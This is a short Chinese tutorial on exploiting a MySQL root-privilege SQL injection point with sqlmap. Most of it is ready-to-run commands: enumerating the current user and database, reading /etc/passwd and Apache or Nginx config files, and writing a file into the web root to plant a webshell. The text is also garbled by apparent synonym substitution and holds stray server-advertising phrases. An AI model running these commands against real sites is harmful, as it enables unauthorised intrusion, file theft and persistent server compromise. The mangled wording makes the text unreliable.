碰着一mysql root权限注入点，实验用sqlmap进一步渗透获取更高权限，东亚服务器 台湾服务器，详细如下：

判定注入点的当前用户和当前数据库

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db

root权限注入点可以实验读取系统文件，好比/etc/passwd,以及apache,nginx的设置文件等，相关设置文件路径如下：

nginx: usr/local/nginx/conf/nginx.conf

常用的apache设置文件路径有：

/etc/httpd/conf/httpd.conf

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

sqlmap读取文件语法：

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"

假如magic_quotes_gpc=off就可以实验举办写入Webshell,sqlmap写入文件语法：

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt

将当地的test.txt写入到站点处事器的html目次下。